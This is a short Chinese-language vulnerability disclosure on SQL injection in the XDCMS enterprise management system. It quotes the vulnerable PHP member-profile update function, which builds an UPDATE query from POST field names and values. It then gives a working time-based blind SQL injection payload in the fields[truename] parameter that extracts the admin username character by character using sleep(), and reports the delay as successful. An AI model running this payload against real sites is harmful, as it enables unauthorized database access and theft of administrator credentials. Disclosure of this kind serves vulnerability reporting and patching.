XDCMS企业管理系统SQL #3

漏洞作者: roker

[php]
public function edit_save(){

$this->member_info();

$userid=intval(Cookie::_getcookie('member_userid'));

$fields=$_POST['fields'];

//�޸�����

$field_sql='';

foreach($fields as $k=>$v){

$f_value=$v;

if(is_array($v)){

$f_value=implode(',',$v);

}

$field_sql.=",`{$k}`='".safe_html($f_value)."'";

}

$field_sql=substr($field_sql,1);

$field_sql="update ".DB_PRE."member set {$field_sql} where userid={$userid}";

$query=$this->mysql->query($field_sql);

 

showmsg(C('update_success'),'index.php?m=member&f=edit');

}
[/php]
只是 safe_html gpc关闭或者php高版本的话,单引号还是可以进去的。 过滤了很多,加上是 updata 。所以盲注延时。

修改抓包修改

fields%5Btruename%5D=a' or if(ascii(substr((select username from c_admin),1,1))-96,sleep(2),null) or '1

延时是成功的

01144326082a9ab8af296c178599f6a363ad346c

发表评论